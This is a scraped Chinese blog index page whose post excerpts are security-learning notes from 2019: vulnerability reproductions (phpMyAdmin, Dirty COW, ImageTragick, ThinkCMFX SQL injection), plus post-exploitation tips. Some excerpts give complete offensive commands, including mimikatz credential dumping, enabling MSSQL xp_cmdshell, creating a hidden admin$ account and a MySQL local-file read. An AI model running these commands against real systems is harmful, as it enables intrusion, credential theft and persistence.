自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

https://www.cnblogs.com/zpchcbd/

之后的博客放到博客园了

  • 博客(23)
  • 收藏
  • 关注

原创 Docker的学习

向来用vulhub只会docker-compose up -d直接搭建 自己也想多学点命令哈!

2019-08-31 23:28:03 153

原创 [CVE-2018-12613]phpmyadmin4.8.1远程文件包含漏洞复现

漏洞原理:一个攻击者可以在服务器上包含(查看和潜在执行)文件的漏洞被发现。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。攻击者必须经过身份验证,但在这些情况下除外:$ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码$ cfg [‘S...

2019-08-31 22:53:22 524

原创 [CVE-2016-5734]phpmyadmin(4.3.0-4.6.2)命令执行漏洞复现

触发原因:preg_replace函数引发的触发原理:preg_replace漏洞触发有两个前提:01:第一个参数需要e标识符,有了它可以执行第二个参数的命令02:第一个参数需要在第三个参数中的中有匹配,不然echo会返回第三个参数而不执行命令,举个例子:影响漏洞版本:漏洞复现:1、docker搭建 docker-compose up -d2、漏洞利用代码:python php...

2019-08-30 16:21:45 666

原创 windows获取RDP连接记录

0x01 获取RDP连接历史记录:以下代码为3gStudent实现的获取连接记录的代码:<#.SYNOPSISThis script will list the logged-in users' RDP Connections History.Author: 3gstudent@3gstudentLicense: BSD 3-Clause#>$AllUser = Get...

2019-08-26 13:01:06 5807

原创 Python json库的学习

使用方法:import jsonjson.dumps将 Python 对象编码成 JSON 字符串json.dump() 将python数据对象以JSON格式数据流的形式写入到文件json.loads将已编码的 JSON 字符串解码为 Python 对象json.load() 解析包含JSON数据的文件为python对象...

2019-08-25 16:38:54 147

原创 mysql低权限读取文件利用

此时的test用户是没有file读取权限的:利用语句:load data local infile 'D:\\QMDownload\\PHPTutorial\\www\\Sqlilabs\\phpinfo.php' into table users fields terminated by '' lines terminated by '\n';fields terminated by ‘,...

2019-08-22 13:08:40 1023

原创 [CVE-2016-5195]linux脏牛提权复现

1、复制源代码dirty.c到可读写目录-------》 /tmp/dirty.c2、进行gcc编译-----------------------》gcc -pthread dirty.c -o dirty -lcrypt3、运行编译好的文件-------------------》./dirty 你设置的密码4、如果一直卡住的话尝试反弹shell 在交互式中进行...

2019-08-21 12:54:38 471

原创 使用隧道技术进行C&C通信的学习

一、C&C通信这里的C&C服务器指的是Command & Control Server–命令和控制服务器,说白了就是被控主机的遥控端。一般C&C节点分为两种,C&C Server 和 C&C Client。Server就是就是黑客手里的遥控器。Client就是被控制的电脑,也就是受害者。C&C通信就是Client和Server之间的通信。再...

2019-08-20 08:53:44 1667

原创 SNMP服务的利用

探测:工具:snmputil,然后执行命令:Snmputil.exe walk IP public .1.3.6.1.2.1.1进一步的利用:snmputil.exe walk 对方IP public .1.3.6.1.2.1.25.4.2.1.2 //**进程列表 snmputil.exe walk 对方IP public .1.3.6.1.4.77.1.2.25.1.1 ...

2019-08-19 21:22:36 1504

原创 MSSQL的提权

MSSQL的提权:1、sql2005版本以后默认为关闭状态,需要开启命令执行开启xp_cmdshell;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;注入点不支持多执行的话,需要一句一句的运行;exec sp_configur...

2019-08-19 14:18:34 510

原创 SSF工具的使用

免杀免杀免杀!!!!3.ssf.exe正向代理:webshell:上传ssfd.exe 和certs目录webshell执行:ssfd.exe -p 5555外网vps:ssf.exe -D 9999-p 5555 shell的外网ip (ping域名得知)如果无法连接??netsh advfirewall firewall add rule name=“ssf2” dir=i...

2019-08-19 10:10:44 2987

原创 LCX工具的使用

原由:今天老大要我们复现lcx的端口转发工具:lcx目的:登陆192.168.1.130的3389服务受害者内网的主机(无法出网):192.168.1.130内网ip受害者内网的主机(跳板):192.168.1.131内网ip攻击者的主机:192.168.2.130内网ip攻击者的外网服务器:120.79.66.571、通过受害者的主机的web服务拿到了服务器的shell权限2...

2019-08-13 23:56:33 9704 2

原创 ThinkCMFX漏洞合集

前台的SQL注入(需要前台会员权限):POST /ThinkCMFX/index.php?g=portal&m=article&a=edit_post HTTP/1.1Host: localhostConnection: closeCookie: PHPSESSID=kcg5v82ms3v13o8pgrhh9saj95Content-Type: application/...

2019-08-13 20:30:57 5636

原创 [CVE-2016–3714]-Imagetragick 命令执行漏洞复现

路径:/root/vulhub/imagemagick/imagetragick搭建:docker-compose up -d打开地址:存在三个文件demo.php upload.php vul.jpgvul.jpg是攻击的模板push graphic-contextviewbox 0 0 640 480fill 'url(https://example.com/image.jpg...

2019-08-13 13:06:09 734 2

原创 DNS记录

1.A记录:用来指定主机名(或域名)对应的IP地址记录。2.MX记录:邮件交换记录。3.NS记录:域名服务器记录。4.CNAME记录:别名记录,也被称为规范名字。域名解析就是域名到IP地址的转换过程。域名的解析工作由DNS服务器完成。一、A (Address) 记录:是用来指定主机名(或域名)对应的IP地址记录。用户可以将该域名下的网站服务器指向到自己的网页服务器(web server)...

2019-08-12 09:43:07 667

转载 后渗透权限维持的方法

一、影子账户net user admin$ admin /add具体可以通过注册表查找HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\Users\Names,在默认情况下,隐藏用户的查看是隐藏的。解决方法:在SAM文件夹处点击右键—>权限(设置就好了)二、shift后门1、先删除缓存C:\WINDOWS\system32\dllcache...

2019-08-11 09:15:04 4400 3

原创 mysql的权限管理和用户创建

通过grant和revoke可以在几个层次上控制访问权限1,全局层级:整个服务器,使用 grant ALL 和revoke ALL2,数据库层级:整个数据库,使用on database.*3,表层级:特点表,使用on database.table4,列层级:特定的列5,子程序层级:特定的存储过程权限管理:一、权限命令标识 授权表中对应的列...

2019-08-10 13:31:29 159

原创 windows定时任务schtasks命令的学习

SCHTASKS/Create [/S system [/U username [/P [password]]]] [/RU username [/RP password]] /SC schedule [/MO modifier] [/D day] [/M months] [/I idletime] /TN taskname /TR taskrun [/ST startt...

2019-08-07 10:06:03 977

原创 Gene6 FTP Server的提权方法

http://blog.chinaunix.net/uid-28991324-id-4291928.html

2019-08-05 22:51:23 344

原创 mysql提权和技巧

不会免杀 对于udf提权的话 市面上的udf.dll udf的提权脚本基本遇到360之类的杀毒软件都GG思密达 但是可能能通过以下方法来绕过:将自己要提权的php脚本后缀修改为csproj 然后再通过包含文件...

2019-08-05 14:04:04 278

原创 命令符& && ||的区别

aa && bb执行aa,成功后再执行bbaa || bb先执行aa,若执行成功则不再执行bb,若失败则再执行bbaa & bb先执行aa再执行bb,无论aa是否成功

2019-08-04 20:57:19 301

原创 cs和msf配合进行内网的操作

cs中直接添加一个socks代理msf中的操作相应的cs中socks的代理端口,然后利用msf对内网进一步的探测setg Proxies socks4:xxx.xxx.xxx.xxx:44803

2019-08-03 23:13:59 1623

原创 使用mimikatz的技巧

1、以日志文件生成保存在当前文件夹中log.txt 并且再列出目录mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir2、自定义保存在log.txt中mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpassw...

2019-08-03 10:25:05 1031

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除